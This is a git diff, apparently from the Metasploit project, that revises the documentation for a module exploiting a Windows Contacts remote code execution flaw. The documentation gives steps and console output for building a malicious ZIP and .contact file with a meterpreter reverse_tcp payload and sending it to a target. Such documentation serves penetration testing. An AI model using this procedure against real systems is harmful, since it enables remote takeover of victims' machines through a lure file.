Updated documentation to reflect new simplified module options
parent
62bf38d530
commit
324f2f0939
|
@ -1,6 +1,5 @@
|
|||
## Description
|
||||
|
||||
12345678901234567890123456789012345678901234567890123456789012345678901234567890
|
||||
This module allows remote attackers to execute arbitrary code on vulnerable
|
||||
installations of Microsoft Windows. User interaction is required to exploit
|
||||
this vulnerability in that the target must visit a malicious page or open a
|
||||
|
@ -30,10 +29,10 @@ Windows Contacts
|
|||
2. `use exploit/windows/fileformat/microsoft_windows_contact_remote_code_execution`
|
||||
3. Configure the payload. For example: `set PAYLOAD windows/x64/meterpreter/bind_tcp`
|
||||
4. Configure the payload parameters. For example: `set LHOST 192.168.1.1`
|
||||
5. Set the output internal file: `set FILENAME msf.com`
|
||||
6. Set the name of the contact: `set FULL_NAME John Smith`
|
||||
7. Set the output of the ZIP to be delivered to the target: `set ZIP John Smith.zip`
|
||||
8. `run`
|
||||
5. Enter the name of the user to be embedded in the contact, which will also be used as the filename for the .ZIP and .CONTACTS files. For example, `set FILENAME John Smith`
|
||||
6. Enter the fake URL that the user must click to launch the payload. Note, this does not need to be a valid domain. For example: `set WEBSITE metasploit.com`
|
||||
7. `run`
|
||||
8. Confirm the ZIP file was created, and that it contains a `.CONTACT` file along with a payload in the `http` folder.
|
||||
|
||||
## Scenarios
|
||||
|
||||
|
@ -42,23 +41,21 @@ Windows Contacts
|
|||
1. Configure the module-specific settings.
|
||||
|
||||
```
|
||||
msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > set FILENAME metasploit.com
|
||||
FILENAME => metasploit.com
|
||||
msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > set FULL_NAME David Davidson
|
||||
FULL_NAME => David Davidson
|
||||
msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > set ZIP David Davidson.zip
|
||||
ZIP => David Davidson.zip
|
||||
msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > set WEBSITE metasploit.com
|
||||
WEBSITE => metasploit.com
|
||||
msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > set FILENAME John Smith
|
||||
FILENAME => John Smith
|
||||
```
|
||||
|
||||
2. Configure the payload.
|
||||
```
|
||||
msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
|
||||
msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
|
||||
PAYLOAD => windows/x64/meterpreter/reverse_tcp
|
||||
msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > set LHOST 192.168.199.148
|
||||
LHOST => 192.168.199.148
|
||||
msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > set LHOST 192.168.1.148
|
||||
LHOST => 192.168.1.148
|
||||
msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > run
|
||||
|
||||
[*] Creating 'David Davidson.zip'
|
||||
[+] Creating 'John Smith.zip'
|
||||
```
|
||||
|
||||
3. Send the ZIP to the target machine.
|
||||
|
|
Loading…
Reference in New Issue